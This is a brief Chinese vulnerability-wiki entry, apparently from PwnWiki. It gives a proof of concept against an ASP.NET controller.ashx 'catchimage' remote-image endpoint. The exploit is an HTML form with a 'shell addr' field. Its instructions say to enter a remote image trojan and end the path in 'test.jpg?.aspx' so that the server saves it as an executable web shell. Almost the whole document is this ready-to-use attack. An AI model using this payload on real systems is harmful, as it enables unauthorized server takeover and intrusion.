免费、自由、人人(PwnWiki.Com)可编辑的漏洞库
,
POC
<form action="www.XXXX.com.cn/controller.ashx?action=catchimage" enctype="application/x-www-form-urlencoded" method="POST"> <p>shell addr:<input type="text" name="source"/></p> <input type="submit" value="submit"/> </form>
保存为html文件,打开后上传框输入远程图片马test.jpg,上传时路径最后改为test.jpg?.aspx
免费、自由、人人可编辑的漏洞库--pwnwiki.com
